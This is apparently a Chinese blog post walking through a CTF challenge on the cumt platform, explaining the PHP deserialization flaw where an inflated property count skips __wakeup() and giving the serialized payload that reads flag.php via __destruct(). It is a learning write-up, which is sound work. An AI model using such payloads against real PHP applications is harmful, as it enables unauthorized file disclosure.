浅析cumt平台上的一道反序列化题目

听说你会面向对象

这题用了反序列化的一个漏洞,如果还不知道什么是反序列化,参考下面的文章
http://www.freebuf.com/column/151447.html

这一题其实还是很简单的,只是我不知道php反序列化的一个漏洞,那就是PHP当序列化字符串中表示对象属性数的值大于真实的属性个数时会跳过wakeup()的执行

因为我一开始构造的类是这样的

1
2
3
4
5
6
7
8
9
10
11
12
<?php

class Admin{
public $file ;
}


$a = new Admin();
$a->file='flag.php';
print_r (serilize($a));

?>

然后得到 data=O:5:"Admin":1:{s:4:"file";s:8:"flag.php";}
然后发现是这个样子的
CghKa9.png
肯定是在序列化的时候wakeup()函数在搞鬼,后面加了1.。。。
其实这段代码主要是利用了_
destruct()函数把文件内容会显示出来
于是就利用上面说的那一个漏洞改一下payload:data=O:5:”Admin”:2:{s:4:”file”;s:8:”flag.php”;}
flag就出来了
CghM5R.png

看来自己对于反序列化还是了解甚小,不得不承认自己还是个菜鸡,参考博文
http://www.voidcn.com/article/p-ybezdnbn-bmu.html
https://mp.weixin.qq.com/s__biz=MzIzOTQ5NjUzOQ%3D%3D&mid=2247483735&idx=1&sn=a886de95750b069c87961ce336fe2f6d&chksm=e9287d63de5ff475a095abe626d386c94509f14298b46b3271c1f9776691ffe2e531024a12f9&mpshare=1&scene=23&srcid=0907F7nrIu4WchffyQBy9jks#rd


听说,打赏我的人最后都成了大佬。



文章目录
  1. 1. 听说你会面向对象